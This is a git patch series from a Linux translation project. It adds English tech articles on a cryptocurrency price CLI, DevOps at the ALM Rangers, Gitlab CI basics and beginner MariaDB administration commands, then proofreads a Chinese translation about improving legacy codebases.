sources/tech/20171123 Check Cryptocurrency Prices From Commandline.md diff --git a/sources/tech/20171123 Check Cryptocurrency Prices From Commandline.md b/sources/tech/20171123 Check Cryptocurrency Prices From Commandline.md new file mode 100644 index 0000000000..a6faf7a2c1 --- /dev/null +++ b/sources/tech/20171123 Check Cryptocurrency Prices From Commandline.md @@ -0,0 +1,87 @@ +Check Cryptocurrency Prices From Commandline +====== +![配图](https://www.ostechnix.com/wp-content/uploads/2017/11/bitcoin-1-720x340.jpg) +A while ago, we published a guide about **[Cli-Fyi][1] ** - a potentially useful command line query tool. Using Cli-Fyi, we can easily find out the latest price of a cryptocurrency and lots of other useful details. Today, we are going to see yet another cryptcurrency price checker tool called **" Coinmon"**. Unlike Cli.Fyi, Coinmon is only for checking the price of various cryptocurrencies. Nothing more! Coinmon will check cryptocurrencies' prices, changes right from your Terminal. It will fetch all details from from [coinmarketcap.com][2] APIs. It is quite useful for those who are both **Crypto investors** and **Engineers**. + +### Installing Coinmon + +Make sure you have Node.js and Npm installed on your system. If you don't have Node.js and/or npm installed on your machine, refer the following link to install them. + +Once Node.js and Npm installed, run the following command from your Terminal to install Coinmon. +``` +sudo npm install -g coinmon +``` + +### Check Cryptocurrency Prices From Commandline + +Run the following command to check the top 10 cryptocurrencies ranked by their market cap: +``` +coinmon +``` + +Sample output would be: + +[![][3]][4] + +Like I said, if you run the coinmon without any parameters, it will display the top 10 cryptocurrencies. You can also find top top n cryptocurrencies, for example 20, by using "-t" flag. +``` +coinmon -t 20 +``` + +All prices will be displayed in USD by default. You can also convert price from USD to another currency by using "-c" flag. + +For instance, to convert the prices to INR (Indian Rupee), run: +``` +coinmon -c inr +``` + +[![][3]][5] + +Currently, Coinmon supports AUD, BRL, CAD, CHF, CLP, CNY, CZK, DKK, EUR, GBP, HKD, HUF, IDR, ILS, INR, JPY, KRW, MXN, MYR, NOK, NZD, PHP, PKR, PLN, RUB, SEK, SGD, THB, TRY, TWD, ZAR currencies. + +It is also possible to search the prices using the symbol of a cryptocurrency. +``` +coinmon -f btc +``` + +Here, **btc** is the symbol of Bitcoin cryptocurrency. You can view the symbols of all available cryptocurrencies [**here**][6]. + +For more details, refer coinmon's help section: +``` +$ coinmon -h + +Usage: coinmon [options] + +Options: + + -V, --version output the version number + -c, --convert [currency] Convert to your fiat currency (default: usd) + -f, --find [symbol] Find specific coin data with coin symbol (can be a comma seperated list) (default: ) + -t, --top [index] Show the top coins ranked from 1 - [index] according to the market cap (default: null) + -H, --humanize [enable] Show market cap as a humanized number, default true (default: true) + -h, --help output usage information +``` + +Hope this helps. More good stuffs to come. Stay tuned! + +Cheers! + + + +-------------------------------------------------------------------------------- + +via: https://www.ostechnix.com/coinmon-check-cryptocurrency-prices-commandline/ + +作者:[SK][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.ostechnix.com/author/sk/ +[1]:https://www.ostechnix.com/cli-fyi-quick-easy-way-fetch-information-ips-emails-domains-lots/ +[2]:https://coinmarketcap.com/ +[3]:data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 +[4]:http://www.ostechnix.com/wp-content/uploads/2017/11/coinmon-1.png () +[5]:http://www.ostechnix.com/wp-content/uploads/2017/11/coinmon-2.png () +[6]:https://en.wikipedia.org/wiki/List_of_cryptocurrencies From 1c1a565f22c21859f55fe3022089d2451ac50598 Mon Sep 17 00:00:00 2001 From: darksun Date: Wed, 27 Dec 2017 23:15:46 +0800 Subject: [PATCH 0830/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20DevOps=20?= =?UTF-8?q?eliminated=20bottlenecks=20for=20Ranger=20community?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...inated bottlenecks for Ranger community.md | 71 +++++++++++++++++++ 1 file changed, 71 insertions(+) create mode 100644 sources/tech/20171122 How DevOps eliminated bottlenecks for Ranger community.md diff --git a/sources/tech/20171122 How DevOps eliminated bottlenecks for Ranger community.md b/sources/tech/20171122 How DevOps eliminated bottlenecks for Ranger community.md new file mode 100644 index 0000000000..697b6733fc --- /dev/null +++ b/sources/tech/20171122 How DevOps eliminated bottlenecks for Ranger community.md @@ -0,0 +1,71 @@ +How DevOps eliminated bottlenecks for Ranger community +====== +![配图](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/traffic-light-go.png?itok=nC_851ys) +The Visual Studio Application Lifecycle Management (ALM) [Ranger][1] program is a community of volunteers that gives professional guidance, practical experience, and gap-filling solutions to the developer community. It was created in 2006 as an internal Microsoft community to "connect the product group with the field and remove adoption blockers." By 2009, the community had more than 200 members, which led to collaboration and planning challenges, bottlenecks due to dependencies and manual processes, and increasing delays and dissatisfaction within the developer community. In 2010, the program evolved to include Microsoft Most Valued Professionals (MVPs), expanding into a geographically distributed community that spans the globe. + +The community is divided into roughly a dozen active teams. Each team is committed to design, build, and support one guidance or tooling project through its lifetime. In the past, teams typically bottlenecked at the team management level due to a rigid, waterfall-style process and high dependency on one or more program managers. The program managers intervened in decision making, releases, and driving the "why, what, and how" for projects. Also, a lack of real-time metrics prevented teams from effectively monitoring their solutions, and alerts about bugs and issues typically came from the community. + +It was time to find a better way of doing things and delivering value to the developer community. + +### DevOps to the rescue + +> "DevOps is the union of people, process, and products to enable continuous delivery of value to our end users." --[Donovan Brown][2] + +To address these challenges, the community stopped all new projects for a couple of sprints to explore Agile practices and new products. The aim was to re-energize the community, to find ways to promote autonomy, mastery, and purpose, as outlined in the book [Drive][3], by Daniel H. Pink, and to overhaul the rigid processes and products. + +> Mature self-organizing, self-managed, and cross-functional teams thrive on autonomy, mastery, and purpose." --Drive, Daniel H. Pink. + +Getting the culture--the people--right was the first step to embrace DevOps. The community implemented the [Scrum][4] framework, used [kanban][5] to improve the engineering process, and adopted visualization to improve transparency, awareness, and most important, trust. With self-organization of teams, the traditional hierarchy and chain-of-command disappeared. Self-management encouraged teams to actively monitor and evolve their own process. + +In April 2010, the community took another pivotal step by switching and committing its culture, process, and products to the cloud. While the core focus of the free "by-the-community-for-the-community" [solutions][6] remains on guidance and filling gaps, there's a growing investment in open source solutions (OSS) to research and share outcomes from the DevOps transformations. + +Continuous integration (CI) and continuous delivery (CD) replaced rigid manual processes with automated pipelines. This empowered teams to deploy solutions to canary and early-adopter users without intervention from program management. Adding telemetry enabled teams to watch their solutions and often detect and address unknown issues before users noticed them. + +The DevOps transformation is an ongoing evolution, using experiments to explore and validate people, process, and product innovations. Recent experiments introduced pipeline innovations that are continuously improving the value flow. Scanning components automatically, continuously, and silently checks security, licensing, and quality of open source components. Deployment rings and feature flags enable teams to have fine-grained control of features for all or specific users. + +In October 2017, the community moved most of its private version control repositories to [GitHub][7]. Transferring ownership and administration responsibilities for all repositories to the ALM DevOps Rangers community gives the teams autonomy and an opportunity to energize the broader community to contribute to the open source solutions. Teams are empowered to deliver quality and value to their end users. + +### Benefits and accomplishments + +Embracing DevOps enabled the Ranger community to become nimble, realize faster-to-market and quicker-to-learn-and-react processes, reduce investment of precious time, and proclaim autonomy. + +Here's a list of our observations from the transition, listed in no specific order: + + * Autonomy, mastery, and purpose are core. + * Start with something tangible and iterate--avoid the big bang. + * Tangible and actionable metrics are important--ensure it does not turn into noise. + * The most challenging parts of transformation are the people (culture). + * There's no blueprint; every organization and every team is unique. + * Transformation is continuous. + * Transparency and visibility are key. + * Use the engineering process to reinforce desired behavior. + + + +Table of transformation changes: + +PAST CURRENT ENVISIONED Branching Servicing and release isolation Feature Master Build Manual and error prone Automated and consistent Issue detection Call from user Proactive telemetry Issue resolution Days to weeks Minutes to days Minutes Planning Detailed design Prototyping and storyboards Program management 2 program managers (PM) 0.25 PM 0.125 PM Release cadence 6 to 12 months 3 to 5 sprints Every sprint Release Manual and error prone Automated and consistent Sprints 1 month 3 weeks Team size 10 to 15 2 to 5 Time to build Hours Seconds Time to release Days Minutes + +But, we're not done! Instead, we're part of an exciting, continuous, and likely never-ending transformation. + +If you'd like to learn more about our transformation, positive experiences, and known challenges that need to be addressed, see "[Our journey of transforming to a DevOps culture][8]." + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/11/devops-rangers-transformation + +作者:[Willy Schaub][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/wpschaub +[1]:https://aka.ms/vsaraboutus +[2]:http://donovanbrown.com/post/what-is-devops +[3]:http://www.danpink.com/books/drive/ +[4]:http://www.scrumguides.org/scrum-guide.html +[5]:https://leankit.com/learn/kanban/what-is-kanban/ +[6]:https://aka.ms/vsarsolutions +[7]:https://github.com/ALM-Rangers +[8]:https://github.com/ALM-Rangers/Guidance/blob/master/src/Stories/our-journey-of-transforming-to-a-devops-culture.md From decf660f906a881eca2fbf877db517a8f4375983 Mon Sep 17 00:00:00 2001 From: darksun Date: Wed, 27 Dec 2017 23:18:12 +0800 Subject: [PATCH 0831/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20A=20generic=20i?= =?UTF-8?q?ntroduction=20to=20Gitlab=20CI?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...128 A generic introduction to Gitlab CI.md | 130 ++++++++++++++++++ 1 file changed, 130 insertions(+) create mode 100644 sources/tech/20171128 A generic introduction to Gitlab CI.md diff --git a/sources/tech/20171128 A generic introduction to Gitlab CI.md b/sources/tech/20171128 A generic introduction to Gitlab CI.md new file mode 100644 index 0000000000..1c1e985232 --- /dev/null +++ b/sources/tech/20171128 A generic introduction to Gitlab CI.md @@ -0,0 +1,130 @@ +translating by lujun9972 +A generic introduction to Gitlab CI +====== +At [fleetster][1] we have our own instance of [Gitlab][2] and we rely a lot on [Gitlab CI][3]. Also our designers and QA guys use (and love) it, thanks to its advanced features. + +Gitlab CI is a very powerful system of Continuous Integration, with a lot of different features, and with every new releases, new features land. It has a very rich technical documentation, but it lacks a generic introduction for whom want to use it in an already existing setup. A designer or a tester doesn't need to know how to autoscale it with Kubernetes or the difference between an `image` or a `service`. + +But still, he needs to know what is a **pipeline** , and how to see a branch deployed to an **environment**. In this article therefore I will try to cover as many features as possible, highlighting how the end users can enjoy them; in the last months I explained such features to some members of our team, also developers: not everyone knows what Continuous Integration is or has used Gitlab CI in a previous job. + +If you want to know why Continuous Integration is important I suggest to read [this article][4], while for finding the reasons for using Gitlab CI specifically, I leave the job to [Gitlab.com][3] itself. + +### Introduction + +Every time a developer changes some code he saves his changes in a **commit**. He can then push that commit to Gitlab, so other developers can review the code. + +Gitlab will also start some work on that commit, if the Gitlab CI has been configured. This work is executed by a **runner**. A runner is basically a server (it can be a lot of different things, also your PC, but we can simplify it as a server) that executes instructions listed in the `.gitlab-ci.yml` file, and reports the result back to Gitlab itself, which will show it in his graphical interface. + +When a developer has finished implementing a new feature or a bugfix (activity that usual requires multiple commits), can open a **merge request** , where other member of the team can comment on the code and on the implementation. + +As we will see, also designers and testers can (and really should!) join this process, giving feedbacks and suggesting improvements, especially thanks to two features of Gitlab CI: **environments** and **artifacts**. + +### Pipelines + +Every commit that is pushed to Gitlab generates a **pipeline** attached to that commit. If multiple commits are pushed together the pipeline will be created only for the last of them. A pipeline is a collection of **jobs** split in different **stages**. + +All the jobs in the same stage run in concurrency (if there are enough runners) and the next stage begins only if all the jobs from the previous stage have finished with success. + +As soon as a job fails, the entire pipeline fails. There is an exception for this, as we will see below: if a job is marked as manual, then a failure will not make the pipeline fails. + +The stages are just a logic division between batches of jobs, where doesn't make sense to execute next jobs if the previous failed. We can have a `build` stage, where all the jobs to build the application are executed, and a `deploy` stage, where the build application is deployed. Doesn't make much sense to deploy something that failed to build, does it? + +Every job shouldn't have any dependency with any other job in the same stage, while they can expect results by jobs from a previous stage. + +Let's see how Gitlab shows information about stages and stages' status. + +![pipeline-overview][5] + +![pipeline-status][6] + +### Jobs + +A job is a collection of instructions that a runner has to execute. You can see in real time what's the output of the job, so developers can understand why a job fails. + +A job can be automatic, so it starts automatically when a commit is pushed, or manual. A manual job has to be triggered by someone manually. Can be useful, for example, to automatize a deploy, but still to deploy only when someone manually approves it. There is a way to limit who can run a job, so only trustworthy people can deploy, to continue the example before. + +A job can also build **artifacts** that users can download, like it creates an APK you can download and test on your device; in this way both designers and testers can download an application and test it without having to ask for help to developers. + +Other than creating artifacts, a job can deploy an **environment** , usually reachable by an URL, where users can test the commit. + +Job status are the same as stages status: indeed stages inherit theirs status from the jobs. + +![running-job][7] + +### Artifacts + +As we said, a job can create an artifact that users can download to test. It can be anything, like an application for Windows, an image generated by a PC, or an APK for Android. + +So you are a designer, and the merge request has been assigned to you: you need to validate the implementation of the new design! + +But how to do that? + +You need to open the merge request, and download the artifact, as shown in the figure. + +Every pipeline collects all the artifacts from all the jobs, and every job can have multiple artifacts. When you click on the download button, it will appear a dropdown where you can select which artifact you want. After the review, you can leave a comment on the MR. + +You can always download the artifacts also from pipelines that do not have a merge request open ;-) + +I am focusing on merge request because usually is where testers, designer, and shareholder in general enter the workflow. + +But merge requests are not linked to pipelines: while they integrate nice one in the other, they do not have any relation. + +![download-artifacts][8] + +### Environments + +In a similar way, a job can deploy something to an external server, so you can reach it through the merge request itself. + +As you can see the environment has a name and a link. Just clicking the link you to go to a deployed version of your application (of course, if your team has setup it correctly). + +You can click also on the name of the environment, because Gitlab has also other cool features for environments, like [monitoring][9]. + +![environment][10] + +### Conclusion + +This was a small introduction to some of the features of Gitlab CI: it is very powerful, and using it in the right way allows all the team to use just one tool to go from planning to deploying. A lot of new features are introduced every month, so keep an eye on the [Gitlab blog][11]. + +For setting it up, or for more advanced features, take a look to the [documentation][12]. + +In fleetster we use it not only for running tests, but also for having automatic versioning of the software and automatic deploys to testing environments. We have automatized other jobs as well (building apps and publish them on the Play Store and so on). + +Speaking of which, **do you want to work in a young and dynamically office with me and a lot of other amazing guys?** Take a look to the [open positions][13] at fleetster! + +Kudos to the Gitlab team (and others guys who help in their free time) for their awesome work! + +If you have any question or feedback about this blog post, please drop me an email at [riccardo@rpadovani.com][14] or [tweet me][15] :-) Feel free to suggest me to add something, or to rephrase paragraphs in a clearer way (English is not my mother tongue). + +Bye for now, +R. + +P.S: if you have found this article helpful and you'd like we write others, do you mind to help us reaching the [Ballmer's peak][16] and [buy me][17] a beer? + +-------------------------------------------------------------------------------- + +via: https://rpadovani.com/introduction-gitlab-ci + +作者:[Riccardo][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://rpadovani.com +[1]:https://www.fleetster.net +[2]:https://gitlab.com/ +[3]:https://about.gitlab.com/gitlab-ci/ +[4]:https://about.gitlab.com/2015/02/03/7-reasons-why-you-should-be-using-ci/ +[5]:https://img.rpadovani.com/posts/pipeline-overview.png +[6]:https://img.rpadovani.com/posts/pipeline-status.png +[7]:https://img.rpadovani.com/posts/running-job.png +[8]:https://img.rpadovani.com/posts/download-artifacts.png +[9]:https://gitlab.com/help/ci/environments.md +[10]:https://img.rpadovani.com/posts/environment.png +[11]:https://about.gitlab.com/ +[12]:https://docs.gitlab.com/ee/ci/README.html +[13]:https://www.fleetster.net/fleetster-team.html +[14]:mailto:riccardo@rpadovani.com +[15]:https://twitter.com/rpadovani93 +[16]:https://www.xkcd.com/323/ +[17]:https://rpadovani.com/donations From 7516c9a2b453976406b66156a299e57faa6ab841 Mon Sep 17 00:00:00 2001 From: darksun Date: Wed, 27 Dec 2017 23:26:51 +0800 Subject: [PATCH 0832/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20MariaDB=20admin?= =?UTF-8?q?istration=20commands=20for=20beginners?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...B administration commands for beginners.md | 174 ++++++++++++++++++ 1 file changed, 174 insertions(+) create mode 100644 sources/tech/20171202 MariaDB administration commands for beginners.md diff --git a/sources/tech/20171202 MariaDB administration commands for beginners.md b/sources/tech/20171202 MariaDB administration commands for beginners.md new file mode 100644 index 0000000000..65d8e91749 --- /dev/null +++ b/sources/tech/20171202 MariaDB administration commands for beginners.md @@ -0,0 +1,174 @@ +translating by lujun9972 +MariaDB administration commands for beginners +====== +Earlier we have learned to [**install & secure MariaDB server on Centos/RHEL 7**][1], which is now the default database of RHEL/CentOS 7 onwards.We will now discuss some useful MariaDB administration commands. These are some very basic commands that will get you started with using MariaDB & these can also be used with MySQL, since Mariadb is forked out version of MySQL only. + +**(Recommended Read:[MongoDB installation & configuration on RHEL/CentOS][2])** + +## MariaDB Administration Commands + +### Checking version of your MariaDB installation + +To check the current version of your DB installation, type following command in your terminal + +``` +$ mysql -version +``` + +This command provide you with the current version of DB. Alternatively you can also run below mentioned command for detailed view on version, + +``` +$ mysqladmin -u root -p version +``` + +### Logging into mariadb + +To log into the mariadb server, run + +``` +$ mysql -u root -p +``` + +& then enter password to login to the session. + +### Showing all database + +To show all the databases that your maridb currently has, run + +``` +$ show databases; +``` + +after you are logged into mariadb. + +### Creating new databases + +To create a new database in mariadb, run + +``` +$ create database dan; +``` + +when logged into mariabdb. To create a database directly from terminal, run + +``` +$ mysqladmin -u user -p create dan +``` + +Here, **dan** is the name of the new database. + +### Deleting a database + +To delete a database, run + +``` +$ drop database dan; +``` + +from the logged in session of mariadb. Alternatively you can also use, + +``` +$ mysqladmin -u root -p drop dan +``` + +**Note:-** If you are getting an 'access denied' error while running the mysqladmin commands, that might be because we have not given rights to root. To do so, run the command mentioned in point 7, replacing name of the user with root. + +### Creating new user + +To create a new user for database, run + +``` +$ CREATE USER 'dan'@'localhost' IDENTIFIED BY 'password'; +``` + +### Granting access to user for a database + +For providing access to user for a single database, run + +``` +$ GRANT ALL PRIVILEGES ON test.* to 'dan'@'localhost'; +``` + +This will provide user dan complete access over database named test. We can also grant SELECT, INSERT , DELETE permissions to user. + +To provide access to all database, replace test with * i.e. + +``` +$ GRANT ALL PRIVILEGES ON *.* to 'dan'@'localhost'; +``` + +### Creating backup/dump of database + +To create of a single database, run the following command from your terminal window, + +``` +$ mysqldump -u root -p database_name>db_backup.sql +``` + +To create backup of multiple databases in single command, + +``` +$ mysqldump -u root -p - - databases db1 db2 > db12_backup.sql +``` + +To create dump of all databases in single command, + +``` +$ mysqldump -u root -p - - all-databases >all_dbs.sql +``` + +### Restoring database from the dump + +To restore database from a dump, run + +``` +$ mysql -u root -p database_name Date: Wed, 27 Dec 2017 14:50:31 -0800 Subject: [PATCH 0833/1627] Proofread by JianqinWang --- ...170530 How to Improve a Legacy Codebase.md | 59 +++++++++---------- 1 file changed, 29 insertions(+), 30 deletions(-) diff --git a/translated/tech/20170530 How to Improve a Legacy Codebase.md b/translated/tech/20170530 How to Improve a Legacy Codebase.md index a1869b0449..8cd012a1c3 100644 --- a/translated/tech/20170530 How to Improve a Legacy Codebase.md +++ b/translated/tech/20170530 How to Improve a Legacy Codebase.md @@ -1,68 +1,67 @@ # 如何改善遗留的代码库 -这在每一个程序员,项目管理员,团队领导的一生中都会至少发生一次。原来的程序员早已离职去度假了,留下了一坨几百万行屎一样的代码和文档(如果有的话),一旦接手这些代码,想要跟上公司的进度简直让人绝望。 +这在每一个程序员,项目管理员,团队领导的一生中都会至少发生一次。原来的程序员早已离职去度假了,给你留下了一坨几百万行屎一样的代码和(如果有的话)跟今日勉强支撑公司运行的代码驴头不对马嘴的文档。 -你的工作是带领团队摆脱这个混乱的局面 +你的任务:带领团队摆脱这个混乱的局面。 -当你的第一反应过去之后,你开始去熟悉这个项目,公司的管理层都在关注着你,所以项目只能成功,然而,看了一遍代码之后却发现很大的可能会失败。那么该怎么办呢? +当你的第一反应(逃命)过去之后,你开始去熟悉这个项目。公司的管理层都在关注着你,所以项目只能成功;然而,看了一遍代码之后却发现失败几乎是不可避免。那么该怎么办呢? -幸运(不幸)的是我已经遇到好几次这种情况了,我和我的小伙伴发现将这坨热气腾腾的屎变成一个健康可维护的项目是非常值得一试的。下面这些是我们的一些经验: +幸运(不幸)的是我已经遇到好几次这种情况了,我和我的小伙伴发现将这坨热气腾腾的屎变成一个健康可维护的项目是一个有丰厚利润的业务。下面这些是我们的一些经验: ### 备份 -在开始做任何事情之前备份与之可能相关的所有文件。这样可以确保不会丢失任何可能会在另外一些地方很重要的信息。一旦修改其中一些文件,你可能花费一天或者更多天都解决不了这个愚蠢的问题,配置数据通常不受版本控制,所以特别容易受到这方面影响,如果定期备份数据时连带着它一起备份了,还是比较幸运的。所以谨慎总比后悔好,复制所有东西到一个绝对安全的地方吧,除非这些文件是只读模式否则不要轻易碰它。 +在开始做任何事情之前备份与之可能相关的所有文件。这样可以确保不会丢失任何可能会在另外一些地方很重要的信息。一旦修改其中一些文件,你可能花费一天或者更多天都解决不了这个愚蠢的问题。配置数据通常不受版本控制,所以特别容易受到这方面影响,如果定期备份数据时连带着它一起备份了,还是比较幸运的。所以谨慎总比后悔好,复制所有东西到一个绝对安全的地方并不要轻易碰它,除非这些文件是只读模式。 -### 必须确保代码能够在生产环境下构建运行并产出,这是重要的先决条件。 +### 重要的先决条件:必须确保代码能够在生产环境下构建运行并产出 -之前我假设环境已经存在,所以完全丢了这一步,Hacker News 的众多网友指出了这一点并且证明他们是对的:第一步是确认你知道在生产环境下运行着什么东西,也意味着你需要在你的设备上构建一个跟生产环境上运行的版本每一个字节都一模一样的版本。如果你找不到实现它的办法,一旦你将它投入生产环境,你很可能会遭遇一些很糟糕的事情。确保每一部分都尽力测试,之后在你足够信任它能够很好的运行的时候将它部署生产环境下。无论它运行的怎么样都要做好能够马上切换回旧版本的准备,确保日志记录下了所有情况,以便于接下来不可避免的 “验尸” 。 +之前我假设环境已经存在,所以完全丢了这一步,但Hacker News 的众多网友指出了这一点并且证明他们是对的:第一步是确认你知道在生产环境下运行着什么东西,也意味着你需要在你的设备上构建一个跟生产环境上运行的版本每一个字节都一模一样的版本。如果你找不到实现它的办法,一旦你将它投入生产环境,你很可能会遭遇一些预料之外的糟糕事情。确保每一部分都尽力测试,之后在你足够信任它能够很好的运行的时候将它部署生产环境下。无论它运行的怎么样都要做好能够马上切换回旧版本的准备,确保日志记录下了所有情况,以便于接下来不可避免的 “验尸” 。 ### 冻结数据库 -直到你修改代码之前尽可能冻结你的数据库,在你特别熟悉代码库和遗留代码之后再去修改数据库。在这之前过早的修改数据库的话,你可能会碰到大问题,你会失去让新旧代码和数据库一起构建稳固的基础的能力。保持数据库完全不变,就能比较新的逻辑代码和旧的逻辑代码运行的结果,比较的结果应该跟预期的没有差别。 +直到你修改代码结束之前尽可能冻结你的数据库,在你特别熟悉代码库和遗留代码之后再去修改数据库。在这之前过早的修改数据库的话,你可能会碰到大问题,你会失去让新旧代码和数据库一起构建稳固的基础的能力。保持数据库完全不变,就能比较新的逻辑代码和旧的逻辑代码运行的结果,比较的结果应该跟预期的没有差别。 ### 写测试 -在你做任何改变之前,尽可能多的写下端到端测试和集成测试。在你能够清晰的知道旧的是如何工作的情况下确保这些测试能够正确的输出(准备好应对一些突发状况)。这些测试有两个重要的作用,其一,他们能够在早期帮助你抛弃一些错误观念,其二,在你写新代码替换旧代码的时候也有一定防护作用。 +在你做任何改变之前,尽可能多的写下端到端测试和集成测试。确保这些测试能够正确的输出,并测试你对旧的代码运行的各种假设(准备好应对一些意外状况)。这些测试有两个重要的作用:其一,他们能够在早期帮助你抛弃一些错误观念,其二,这些测试在你写新代码替换旧代码的时候也有一定防护作用。 -自动化测试,如果你也有 CI 的使用经验请使用它,并且确保在你提交代码之后能够快速的完成所有测试。 +要自动化测试,如果你有 CI 的使用经验可以用它,并确保在你提交代码之后 CI 能够快速的完成所有测试。 ### 日志监控 -如果旧设备依然可用,那么添加上监控功能。使用一个全新的数据库,为每一个你能想到的事件都添加一个简单的计数器,并且根据这些事件的名字添加一个函数增加这些计数器。用一些额外的代码实现一个带有时间戳的事件日志,这是一个好办法知道有多少事件导致了另外一些种类的事件。例如:用户打开 APP ,用户关闭 APP 。如果这两个事件导致后端调用的数量维持长时间的不同,这个数量差就是当前打开的 APP 的数量。如果你发现打开 APP 比关闭 APP 多的时候,你就必须要知道是什么原因导致 APP 关闭了(例如崩溃)。你会发现每一个事件都跟其他的一些事件有许多不同种类的联系,通常情况下你应该尽量维持这些固定的联系,除非在系统上有一个明显的错误。你的目标是减少那些错误的事件,尽可能多的在开始的时候通过使用计数器在调用链中降低到指定的级别。(例如:用户支付应该得到相同数量的支付回调)。 +如果旧设备依然可用,那么添加上监控功能。在一个全新的数据库,为每一个你能想到的事件都添加一个简单的计数器,并且根据这些事件的名字添加一个函数增加这些计数器。用一些额外的代码实现一个带有时间戳的事件日志,你就能大概知道放生多少事件会导致另外一些种类的事件。例如:用户打开 APP ,用户关闭 APP 。如果这两个事件导致后端调用的数量维持长时间的不同,这个数量差就是当前打开的 APP 的数量。如果你发现打开 APP 比关闭 APP 多的时候,你就必须要知道是什么原因导致 APP 关闭了(例如崩溃)。你会发现每一个事件都跟其他的一些事件有许多不同种类的联系,通常情况下你应该尽量维持这些固定的联系,除非在系统上有一个明显的错误。你的目标是减少那些错误的事件,尽可能多的在开始的时候通过使用计数器在调用链中降低到指定的级别。(例如:用户支付应该得到相同数量的支付回调)。 -这是简单的技巧去将每一个后端应用变成一个就像真实的簿记系统一样,所有数字必须匹配,只要他们在某个地方都不会有什么问题。 +这个简单的技巧可以将每一个后端应用变成一个像真实的簿记系统一样,而像一个真正的簿记系统,所有数字必须匹配,如果它们在某个地方对不上就有问题。 -随着时间的推移,这个系统在监控健康方面变得非常宝贵,而且它也是使用源码控制修改系统日志的一个好伙伴,你可以使用它确认 BUG 出现的位置,以及对多种计数器造成的影响。 +随着时间的推移,这个系统在监控健康方面变得非常宝贵,而且它也是使用源码控制修改系统日志的一个好伙伴,你可以使用它确认 BUG 引进到生产环境的时间,以及对多种计数器造成的影响。 -我通常保持 5 分钟(一小时 12 次)记录一次计数器,如果你的应用生成了更多或者更少的事件,你应该修改这个时间间隔。所有的计数器公用一个数据表,每一个记录都只是简单的一行。 +我通常保持 5 分钟(一小时 12 次)记录一次计数器,但如果你的应用生成了更多或者更少的事件,你应该修改这个时间间隔。所有的计数器公用一个数据表,每一个记录都只是简单的一行。 ### 一次只修改一处 -不要完全陷入在提高代码或者平台可用性的同时添加新特性或者是修复 BUG 的陷阱。这会让你头大而且将会使你之前建立的测试失效,现在必须问问你自己,每一步的操作想要什么样的结果。 +不要陷入在提高代码或者平台可用性的同时添加新特性或者是修复 BUG 的陷阱。这会让你头大,因为你现在必须在每一步操作想好要出什么样的结果,而且会让你之前建立的一些测试失效。 ### 修改平台 -如果你决定转移你的应用到另外一个平台,最主要的是跟之前保持一样。如果你觉得你会添加更多的文档和测试,但是不要忘记这一点,所有的业务逻辑和相互依赖跟从前一样保持不变。 +如果你决定转移你的应用到另外一个平台,最主要的是跟之前保持一模一样。如果你觉得需要,你可以添加更多的文档和测试,但是不要忘记这一点,所有的业务逻辑和相互依赖要跟从前一样保持不变。 ### 修改架构 -接下来处理的是改变应用的结构(如果需要)。这一点上,你可以自由的修改高层的代码,通常是降低模块间的横向联系,这样可以降低代码活动期间对终端用户造成的影响范围。如果老代码是庞大的,那么现在正是让他模块化的时候,将大段代码分解成众多小的,不过不要把变量的名字和他的数据结构分开。 +接下来处理的是改变应用的结构(如果需要)。这一点上,你可以自由的修改高层的代码,通常是降低模块间的横向联系,这样可以降低代码活动期间对终端用户造成的影响范围。如果老代码是庞大的,那么现在正是让它模块化的时候,将大段代码分解成众多小的,不过不要改变量和数据结构的名字。 -Hacker News [mannykannot][1] 网友指出,修改架构并不总是可行,如果你特别不幸的话,你可能为了改变一些架构必须付出沉重的代价。我也赞同这一点,我应该加上这一点,因此这里有一些补充。我非常想补充的是如果你修改高级代码的时候修改了一点点底层代码,那么试着限制只修改一个文件或者最坏的情况是只修改一个子系统,所以尽可能限制修改的范围。否则你可能很难调试刚才所做的更改。 +Hacker News [mannykannot][1] 网友指出,修改高层代码并不总是可行,如果你特别不幸的话,你可能为了改变一些架构必须付出沉重的代价。我赞同这一点也应该在这里加上提示,因此这里有一些补充。我额外想补充的是如果你修改高级代码的时候修改了一点点底层代码,那么试着限制只修改一个文件或者最坏的情况是只修改一个子系统,尽可能限制修改的范围。否则你可能很难调试刚才所做的更改。 ### 底层代码的重构 -现在,你应该非常理解每一个模块的作用了,准备做一些真正的工作吧:重构代码以提高其可维护性并且使代码做好添加新功能的准备。这很可能是项目中最消耗时间的部分,记录你所做的任何操作,在你彻底的记录模块并且理解之前不要对它做任何修改。之后你可以自由的修改变量名、函数名以及数据结构以提高代码的清晰度和统一性,然后请做测试(情况允许的话,包括单元测试)。 +现在,你应该非常理解每一个模块的作用了,准备做一些真正的工作吧:重构代码以提高其可维护性并且使代码做好添加新功能的准备。这很可能是项目中最消耗时间的部分,记录你所做的任何操作,在你彻底的记录并且理解模块之前不要对它做任何修改。之后你可以自由的修改变量名、函数名以及数据结构以提高代码的清晰度和统一性,然后请做测试(情况允许的话,包括单元测试)。 ### 修复 bugs -现在准备做一些用户可见的修改,战斗的第一步是修复很多积累了一整年的bugs,像往常一样,首先证实 bug 仍然存在,然后编写测试并修复这个 bug,你的 CI 和端对端测试应该能避免一些由于不太熟悉或者一些额外的事情而犯的错误。 